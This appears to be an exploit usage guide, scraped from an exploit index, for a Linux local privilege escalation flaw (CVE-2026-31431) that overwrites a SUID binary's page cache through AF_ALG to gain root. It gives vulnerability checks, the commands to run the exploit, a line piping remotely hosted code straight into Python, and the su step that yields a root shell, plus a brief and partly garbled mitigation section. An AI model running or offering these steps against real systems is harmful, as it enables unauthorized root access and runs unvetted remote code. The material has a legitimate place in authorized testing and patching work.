Share
## https://sploitus.com/exploit?id=52EB96E9-BBA2-536C-A65E-0C6CC28D0D6C
# Copy Fail (CVE-2026-31431) โ€“ Exploit Usage Guide

## โš ๏ธ Disclaimer
This content is for educational and authorized security testing purposes only. Do **NOT** run this on systems without explicit permission.

---

## ๐Ÿ“Œ Overview

**Copy Fail (CVE-2026-31431)** is a Linux Local Privilege Escalation (LPE) vulnerability affecting the kernel crypto API via `AF_ALG`.

It allows an unprivileged user to overwrite page cache data of a SUID binary (e.g., `/usr/bin/su`) and gain root access.

---

## ๐Ÿง  Requirements

### System Requirements

- Linux kernel (vulnerable โ€“ depends on patch status)
- `AF_ALG` enabled
- `algif_aead` module loaded

### Python Exploit Requirements

- Python **3.10+**
- Support for:
  - `os.splice`
  - `socket(AF_ALG)`

---

## ๐Ÿ” Checking Vulnerability

```bash
uname -a
grep -i authencesn /proc/crypto
lsmod | grep alg
```

Expected indicators:

- `authencesn(hmac(sha256),cbc(aes))`
- `algif_aead` loaded

---

## ๐Ÿ Running the Python Exploit

### 1. Execute directly

```bash
python3 copy_fail_exp.py
```

### 2. Or via curl (if remote hosted)

```bash
curl https://copy.fail/exp | python3
```

### 3. Trigger root shell

```bash
su
id
```

Expected result:

```bash
uid=0(root)
```

---

## โš ๏ธ Common Issues (Python)

### โŒ Error: `os.splice not found`

Cause:
- Python version  /etc/modprobe.d/disable-algif.conf
rmmod algif_aead
```

### Apply kernel patch

Update your system:

```bash
apt update && apt upgrade
```

---

## ๐Ÿ“Œ Notes

- Exploit modifies **page cache only** (non-persistent)
- Requires local access
- Not remotely exploitable by default

---

## ๐Ÿง  Final Insight

If the exploit fails, consider:

- Kernel already patched
- Environment restrictions
- Alternate privilege escalation vectors (SUID, capabilities, sudo misconfig)

---

## ๐Ÿ“š References

- https://copy.fail/
- CVE-2026-31431

---

## ๐Ÿ‘จโ€๐Ÿ’ป Author Notes

Use this exploit responsibly in labs, CTFs, and authorized pentests only.